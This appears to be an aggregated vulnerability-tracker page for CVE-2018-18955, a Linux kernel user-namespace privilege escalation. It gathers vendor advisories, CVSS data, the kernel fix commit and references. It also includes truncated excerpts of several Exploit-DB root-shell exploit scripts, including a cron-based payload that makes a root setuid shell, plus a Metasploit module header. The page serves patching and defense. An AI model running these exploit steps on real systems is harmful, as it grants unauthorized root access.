CVE-2018-18955
published 2018-11-16
Priority: P3 (46), high · CVSS 3.0: 7
Vector: AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 7.61% (93.8th percentile)
In the Linux kernel 4.15.x through 4.19.x before 4.19.2, map_write() in kernel/user_namespace.c allows privilege escalation because it mishandles nested user namespaces with more than 5 UID or GID ranges. A user who has CAP_SYS_ADMIN in an affected user namespace can bypass access controls on resources outside the namespace, as demonstrated by reading /etc/shadow. This occurs because an ID transformation takes place properly for the namespaced-to-kernel direction but not for the kernel-to-namespaced direction.
Affected
10 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| debian | linux | < linux 4.18.20-1 (bookworm) | linux 4.18.20-1 (bookworm) |
| linux | linux_kernel | >= 0 < 4.18.20-1 | 4.18.20-1 |
| linux | linux_kernel | >= 0 < 4.18.20-1 | 4.18.20-1 |
| linux | linux_kernel | >= 0 < 4.18.20-1 | 4.18.20-1 |
| linux | linux_kernel | >= 0 < 4.18.20-1 | 4.18.20-1 |
| linux | linux_kernel | >= 0 < 4.15.0-42.45 | 4.15.0-42.45 |
| linux | linux_kernel | >= 4.15 < 4.19.2 | 4.19.2 |
CVSS provenance
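| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.0 | 7.0 | HIGH | CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 4.4 | MEDIUM | AV:L/AC:M/Au:N/C:P/I:P/A:P |
| osv | — | 7.0 | HIGH | — |
| vendor_debian | — | 7.0 | HIGH | — |
| vendor_redhat | — | 7.0 | HIGH | — |
| vendor_ubuntu | — | 7.0 | HIGH | — |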
GHSA
GHSA-c6xj-3c77-g5rg: In the Linux kernel 4
ghsa_unreviewed·2022-05-13
CVE-2018-18955 [HIGH] CWE-863 GHSA-c6xj-3c77-g5rg: In the Linux kernel 4
OSV
linux-hwe, linux-gcp vulnerabilities
osv·2018-12-04·CVSS 7.0
CVE-2018-18955 [HIGH] linux-hwe, linux-gcp vulnerabilities
USN-3836-1 fixed vulnerabilities in the Linux kernel for Ubuntu 18.04
LTS. This update provides the corresponding updates for the Linux
Hardware Enablement (HWE) kernel from Ubuntu 18.04 LTS for Ubuntu
16.04 LTS.
Jann Horn discovered that the Linux kernel mishandles mapping UID or GID
ranges inside nested user namespaces in some situations. A local attacker
could use this to bypass access controls on resources outside the
namespace. (CVE-2018-18955)
Philipp Wendler discovered that the overlayfs implementation in the Linux
kernel did not properly verify the directory contents permissions from
within an unprivileged user namespace. A local attacker could use this to
expose sensitive information (protected file names). (CVE-2018-6559)
OSV
linux, linux-gcp, linux-kvm, linux-raspi2 vulnerabilities
osv·2018-12-03·CVSS 7.0
CVE-2018-18955 [HIGH] linux, linux-gcp, linux-kvm, linux-raspi2 vulnerabilities
Jann Horn discovered that the Linux kernel mishandles mapping UID or GID
ranges inside nested user namespaces in some situations. A local attacker
could use this to bypass access controls on resources outside the
namespace. (CVE-2018-18955)
Philipp Wendler discovered that the overlayfs implementation in the Linux
kernel did not properly verify the directory contents permissions from
within an unprivileged user namespace. A local attacker could use this to
expose sensitive information (protected file names). (CVE-2018-6559)
OSV
linux-aws vulnerabilities
osv·2018-11-30·CVSS 7.0
CVE-2018-18955 [HIGH] linux-aws vulnerabilities
Jann Horn discovered that the Linux kernel mishandles mapping UID or GID
ranges inside nested user namespaces in some situations. A local attacker
could use this to bypass access controls on resources outside the
namespace. (CVE-2018-18955)
Philipp Wendler discovered that the overlayfs implementation in the Linux
kernel did not properly verify the directory contents permissions from
within an unprivileged user namespace. A local attacker could use this to
expose sensitive information (protected file names). (CVE-2018-6559)
OSV
CVE-2018-18955: In the Linux kernel 4
osv·2018-11-16·CVSS 7.0
CVE-2018-18955 [HIGH] CVE-2018-18955: In the Linux kernel 4
Kernel
userns: also map extents in the reverse map to kernel IDs
kernel_security·2018-11-05·CVSS 7.0
CVE-2018-18955 [HIGH] userns: also map extents in the reverse map to kernel IDs
The current logic first clones the extent array and sorts both copies, then
maps the lower IDs of the forward mapping into the lower namespace, but
doesn't map the lower IDs of the reverse mapping.
This means that code in a nested user namespace with >5 extents will see
incorrect IDs. It also breaks some access checks, like
inode_owner_or_capable() and privileged_wrt_inode_uidgid(), so a process
can incorrectly appear to be capable relative to an inode.
To fix it, we have to make sure that the "lower_first" members of extents
in both arrays are translated; and we have to make sure that the reverse
map is sorted *after* the translation (since otherwise the translation can
break the sorting).
This is CVE-2018-18955.
Fixes: 6397fa
Ubuntu
Linux kernel (HWE) vulnerabilities
vendor_ubuntu·2018-12-04·CVSS 7.0
CVE-2018-18955 [HIGH] Linux kernel (HWE) vulnerabilities
Title: Linux kernel (HWE) vulnerabilities
Summary: Several security issues were fixed in the Linux kernel.
USN-3836-1 fixed vulnerabilities in the Linux kernel for Ubuntu 18.04
LTS. This update provides the corresponding updates for the Linux
Hardware Enablement (HWE) kernel from Ubuntu 18.04 LTS for Ubuntu
16.04 LTS.
Jann Horn discovered that the Linux kernel mishandles mapping UID or GID
ranges inside nested user namespaces in some situations. A local attacker
could use this to bypass access controls on resources outside the
namespace. (CVE-2018-18955)
Philipp Wendler discovered that the overlayfs implementation in the Linux
kernel did not properly verify the directory contents permissions from
within an unprivileged user namespace. A local attacker could use this to
expose sensitive
Ubuntu
Linux kernel vulnerabilities
vendor_ubuntu·2018-12-03·CVSS 5.5
CVE-2018-17972 [MEDIUM] Linux kernel vulnerabilities
Title: Linux kernel vulnerabilities
Summary: Several security issues were fixed in the Linux kernel.
Jann Horn discovered that the procfs file system implementation in the
Linux kernel did not properly restrict the ability to inspect the kernel
stack of an arbitrary task. A local attacker could use this to expose
sensitive information. (CVE-2018-17972)
Jann Horn discovered that the mremap() system call in the Linux kernel did
not properly flush the TLB when completing, potentially leaving access to a
physical page after it has been released to the page allocator. A local
attacker could use this to cause a denial of service (system crash), expose
sensitive information, or possibly execute arbitrary code. (CVE-2018-18281)
It was discovered that the BPF verifier in the Linux kernel did no
Ubuntu
Linux kernel vulnerabilities
vendor_ubuntu·2018-12-03·CVSS 7.0
CVE-2018-18955 [HIGH] Linux kernel vulnerabilities
Title: Linux kernel vulnerabilities
Summary: Several security issues were fixed in the Linux kernel.
Jann Horn discovered that the Linux kernel mishandles mapping UID or GID
ranges inside nested user namespaces in some situations. A local attacker
could use this to bypass access controls on resources outside the
namespace. (CVE-2018-18955)
Philipp Wendler discovered that the overlayfs implementation in the Linux
kernel did not properly verify the directory contents permissions from
within an unprivileged user namespace. A local attacker could use this to
expose sensitive information (protected file names). (CVE-2018-6559)
Instructions: After a standard system update you need to reboot your computer to make
all the necessary changes.
ATTENTION: Due to an unavoidable ABI change the kerne
Ubuntu
Linux kernel (AWS) vulnerabilities
vendor_ubuntu·2018-11-30·CVSS 7.0
CVE-2018-18955 [HIGH] Linux kernel (AWS) vulnerabilities
Title: Linux kernel (AWS) vulnerabilities
Summary: Several security issues were fixed in the Linux kernel.
Jann Horn discovered that the Linux kernel mishandles mapping UID or GID
ranges inside nested user namespaces in some situations. A local attacker
could use this to bypass access controls on resources outside the
namespace. (CVE-2018-18955)
Philipp Wendler discovered that the overlayfs implementation in the Linux
kernel did not properly verify the directory contents permissions from
within an unprivileged user namespace. A local attacker could use this to
expose sensitive information (protected file names). (CVE-2018-6559)
Instructions: After a standard system update you need to reboot your computer to make
all the necessary changes.
ATTENTION: Due to an unavoidable ABI change the
Ubuntu
Linux kernel (AWS) vulnerabilities
vendor_ubuntu·2018-11-30·CVSS 5.5
CVE-2018-17972 [MEDIUM] Linux kernel (AWS) vulnerabilities
Title: Linux kernel (AWS) vulnerabilities
Summary: Several security issues were fixed in the Linux kernel.
Jann Horn discovered that the procfs file system implementation in the
Linux kernel did not properly restrict the ability to inspect the kernel
stack of an arbitrary task. A local attacker could use this to expose
sensitive information. (CVE-2018-17972)
Jann Horn discovered that the mremap() system call in the Linux kernel did
not properly flush the TLB when completing, potentially leaving access to a
physical page after it has been released to the page allocator. A local
attacker could use this to cause a denial of service (system crash), expose
sensitive information, or possibly execute arbitrary code. (CVE-2018-18281)
It was discovered that the BPF verifier in the Linux kernel
Red Hat
kernel: Privilege escalation in map_write() in kernel/user_namespace.c
vendor_redhat·2018-11-15·CVSS 7.0
CVE-2018-18955 [HIGH] CWE-285 kernel: Privilege escalation in map_write() in kernel/user_namespace.c
A flaw was found in the Linux kernel where map_write() in kernel/user_namespace.c allows privilege escalation as it mishandles nested user namespaces with more than 5 UID or GID ranges. An unprivileged user with
Debian
CVE-2018-18955: linux - In the Linux kernel 4.15.x through 4.19.x before 4.19.2, map_write() in kernel/u...
vendor_debian·2018·CVSS 7.0
CVE-2018-18955 [HIGH] CVE-2018-18955: linux - In the Linux kernel 4.15.x through 4.19.x before 4.19.2, map_write() in kernel/u...
Scope: local
bookworm: resolved (fixed in 4.18.20-1)
bullseye: resolved (fixed in 4.18.20-1)
forky: resolved (fixed in 4.18.20-1)
sid: resolved (fixed in 4.18.20-1)
trixie: resolved (fixed in 4.18.20-1)
No detection rules found.
Exploit-DB
Linux Kernel 4.15.x < 4.19.2 - 'map_write() CAP_SYS_ADMIN' Local Privilege Escalation (polkit Method)
exploitdb·2019-01-04·CVSS 7.0
CVE-2018-18955 [HIGH] Linux Kernel 4.15.x < 4.19.2 - 'map_write() CAP_SYS_ADMIN' Local Privilege Escalation (polkit Method)
Linux Kernel 4.15.x /dev/null 2>/dev/null
}
if ! command_exists gcc; then
echo '[-] gcc is not installed'
exit 1
fi
if ! command_exists /usr/bin/pkexec; then
echo '[-] pkexec is not installed'
exit 1
fi
if ! command_exists /usr/bin/newuidmap; then
echo '[-] newuidmap is not installed'
exit 1
fi
if ! command_exists /usr/bin/newgidmap; then
echo '[-] newgidmap is not installed'
exit 1
fi
if ! test -w .; then
echo '[-] working directory is not writable'
exit 1
fi
echo "[*] Compiling..."
if ! gcc subuid_shell.c -o subuid_shell; then
echo 'Compiling subuid_shell.c failed'
exit 1
fi
if ! gcc subshell.c -o subshell; then
echo 'Compiling gcc_subshell.c failed'
exit 1
fi
if ! gcc rootshell.c -o "${rootshell}"; then
echo 'Compiling rootshell.c failed'
exit 1
fi
echo "[*] Creating /usr/shar
Exploit-DB
Linux Kernel 4.15.x < 4.19.2 - 'map_write() CAP_SYS_ADMIN' Local Privilege Escalation (dbus Method)
exploitdb·2019-01-04·CVSS 7.0
CVE-2018-18955 [HIGH] Linux Kernel 4.15.x < 4.19.2 - 'map_write() CAP_SYS_ADMIN' Local Privilege Escalation (dbus Method)
Linux Kernel 4.15.x /dev/null 2>/dev/null
}
if ! command_exists gcc; then
echo '[-] gcc is not installed'
exit 1
fi
if ! command_exists /usr/bin/dbus-send; then
echo '[-] dbus-send is not installed'
exit 1
fi
if ! command_exists /usr/bin/newuidmap; then
echo '[-] newuidmap is not installed'
exit 1
fi
if ! command_exists /usr/bin/newgidmap; then
echo '[-] newgidmap is not installed'
exit 1
fi
if ! test -w .; then
echo '[-] working directory is not writable'
exit 1
fi
echo "[*] Compiling..."
if ! gcc subuid_shell.c -o subuid_shell; then
echo 'Compiling subuid_shell.c failed'
exit 1
fi
if ! gcc subshell.c -o subshell; then
echo 'Compiling gcc_subshell.c failed'
exit 1
fi
if ! gcc rootshell.c -o "${rootshell}"; then
echo 'Compiling rootshell.c failed'
exit 1
fi
echo "[*] Creating /us
Exploit-DB
Linux - Nested User Namespace idmap Limit Local Privilege Escalation (Metasploit)
exploitdb·2018-11-29·CVSS 7.0
CVE-2018-18955 [HIGH] Linux - Nested User Namespace idmap Limit Local Privilege Escalation (Metasploit)
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'Linux Nested User Namespace idmap Limit Local Privilege Escalation',
'Description' => %q{
This module exploits a vulnerability in Linux kernels 4.15.0 to 4.18.18,
and 4.19.0 to 4.19.1, where broken uid/gid mappings between nested user
namespaces and kernel uid/gid mappings allow elevation to root
(CVE-2018-18955).
The target system must have unprivileged user namespaces enabled and
the newuidmap and newgidmap helpers installed (from uidmap package).
This module has been tested successfully on:
Fedora Workstation 28 kernel 4.16.3-301.fc28.x8
Exploit-DB
Linux Kernel 4.15.x < 4.19.2 - 'map_write() CAP_SYS_ADMIN' Local Privilege Escalation (ldpreload Method)
exploitdb·2018-11-21·CVSS 7.0
CVE-2018-18955 [HIGH] Linux Kernel 4.15.x < 4.19.2 - 'map_write() CAP_SYS_ADMIN' Local Privilege Escalation (ldpreload Method)
Linux Kernel 4.15.x /dev/null 2>/dev/null
}
if ! command_exists gcc; then
echo '[-] gcc is not installed'
exit 1
fi
if ! command_exists /usr/bin/newuidmap; then
echo '[-] newuidmap is not installed'
exit 1
fi
if ! command_exists /usr/bin/newgidmap; then
echo '[-] newgidmap is not installed'
exit 1
fi
if ! test -w .; then
echo '[-] working directory is not writable'
exit 1
fi
echo "[*] Compiling..."
if ! gcc subuid_shell.c -o subuid_shell; then
echo 'Compiling subuid_shell.c failed'
exit 1
fi
if ! gcc subshell.c -o subshell; then
echo 'Compiling gcc_subshell.c failed'
exit 1
fi
if ! gcc rootshell.c -o "${rootshell}"; then
echo 'Compiling rootshell.c failed'
exit 1
fi
if ! gcc libsubuid.c -fPIC -shared -o "${lib}"; then
echo 'Compiling libsubuid.c failed'
exit 1
fi
echo "[*] Adding
Exploit-DB
Linux Kernel 4.15.x < 4.19.2 - 'map_write() CAP_SYS_ADMIN' Local Privilege Escalation (cron Method)
exploitdb·2018-11-21·CVSS 7.0
CVE-2018-18955 [HIGH] Linux Kernel 4.15.x < 4.19.2 - 'map_write() CAP_SYS_ADMIN' Local Privilege Escalation (cron Method)
Linux Kernel 4.15.x /dev/null 2>/dev/null
}
if ! command_exists gcc; then
echo '[-] gcc is not installed'
exit 1
fi
if ! command_exists /usr/bin/newuidmap; then
echo '[-] newuidmap is not installed'
exit 1
fi
if ! command_exists /usr/bin/newgidmap; then
echo '[-] newgidmap is not installed'
exit 1
fi
if ! test -w .; then
echo '[-] working directory is not writable'
exit 1
fi
echo "[*] Compiling..."
if ! gcc subuid_shell.c -o subuid_shell; then
echo 'Compiling subuid_shell.c failed'
exit 1
fi
if ! gcc subshell.c -o subshell; then
echo 'Compiling gcc_subshell.c failed'
exit 1
fi
if ! gcc rootshell.c -o "${rootshell}"; then
echo 'Compiling rootshell.c failed'
exit 1
fi
echo "[*] Writing payload to ${bootstrap}..."
echo "#!/bin/sh\n/bin/chown root:root ${rootshell};/bin/chmod u+s ${r
Exploit-DB
Linux - Broken uid/gid Mapping for Nested User Namespaces
exploitdb·2018-11-16
CVE-2018-18955 Linux - Broken uid/gid Mapping for Nested User Namespaces
---
commit 6397fac4915a ("userns: bump idmap limits to 340") increases the number of
possible uid/gid mappings that a namespace can have from 5 to 340. This is
implemented by switching to a different data structure if the number of mappings
exceeds 5: Instead of linear search over an unsorted array of struct
uid_gid_extent, binary search over a sorted array of struct uid_gid_extent is
used. Because ID mappings are queried in both directions (kernel ID to
namespaced ID and namespaced ID to kernel ID), two copies of the array are
created, one per direction, and they are sorted differently.
In map_write(), at first, during the loop that calls insert_extent(), the member
lower_first of each struct uid_gid_extent contains an ID in the
Metasploit
Linux Nested User Namespace idmap Limit Local Privilege Escalation
metasploit·CVSS 7.0
CVE-2018-18955 [HIGH] Linux Nested User Namespace idmap Limit Local Privilege Escalation
This module exploits a vulnerability in Linux kernels 4.15.0 to 4.18.18, and 4.19.0 to 4.19.1, where broken uid/gid mappings between nested user namespaces and kernel uid/gid mappings allow elevation to root (CVE-2018-18955). The target system must have unprivileged user namespaces enabled and the newuidmap and newgidmap helpers installed (from uidmap package). This module has been tested successfully on: Fedora Workstation 28 kernel 4.16.3-301.fc28.x86_64; Kubuntu 18.04 LTS kernel 4.15.0-20-generic (x86_64); Linux Mint 19 kernel 4.15.0-20-generic (x86_64); Ubuntu Linux 18.04.1 LTS kernel 4.15.0-20-generic (x86_64).
Bugzilla
CVE-2018-18955 kernel: Privilege escalation in map_write() in kernel/user_namespace.c [fedora-all]
bugzilla·2018-11-22·CVSS 7.0
CVE-2018-18955 [HIGH] CVE-2018-18955 kernel: Privilege escalation in map_write() in kernel/user_namespace.c [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of fedora-all.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects multip
Bugzilla
CVE-2018-18955 kernel: Privilege escalation in map_write() in kernel/user_namespace.c
bugzilla·2018-11-19·CVSS 7.0
CVE-2018-18955 [HIGH] CVE-2018-18955 kernel: Privilege escalation in map_write() in kernel/user_namespace.c
A security flaw was found in the Linux kernel where map_write() in kernel/user_namespace.c allows privilege escalation as it mishandles nested user namespaces with more than 5 UID or GID ranges. An unprivileged user with CAP_SYS_ADMIN in an affected user namespace can bypass access controls on resources outside the namespace. This is possible because a user/group id transformation takes place properly for the namespaced-to-kernel direction but not for the kernel-to-namespaced direction.
External References:
https://bugs.chromium.org/p/project-zero/issues/detail?id=1712
https://seclists.org/oss-sec/2018/q4/150
An upstream patch:
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commi
arXiv
The Ideal Versus the Real: Revisiting the History of Virtual Machines and Containers
arxiv_fulltext·2019-04-27
Allison Randal, University of Cambridge
## Abstract
The common perception in both academic literature and the industry
today is that virtual machines offer better security, while containers
offer better performance. However, a detailed review of the history of
these technologies and the current threats they face reveals a
different story. This survey covers key developments in the evolution
of virtual machines and containers from the 1950s to today, with an
emphasis on countering modern misperceptions with accurate historical
details and providing a solid foundation for ongoing research into the
future of secure isolation for multitenant infrastructures, such as
cloud and container deployments.
## Intr
http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=d2f007dbe7e4c9583eea6eb04d60001e85c6f1bd
http://www.securityfocus.com/bid/105941
https://bugs.chromium.org/p/project-zero/issues/detail?id=1712
https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.18.19
https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.19.2
https://github.com/torvalds/linux/commit/d2f007dbe7e4c9583eea6eb04d60001e85c6f1bd
https://security.netapp.com/advisory/ntap-20190416-0003/
https://support.f5.com/csp/article/K39103040
https://usn.ubuntu.com/3832-1/
https://usn.ubuntu.com/3833-1/
https://usn.ubuntu.com/3835-1/
https://usn.ubuntu.com/3836-1/
https://usn.ubuntu.com/3836-2/
https://www.exploit-db.com/exploits/45886/
https://www.exploit-db.com/exploits/45915/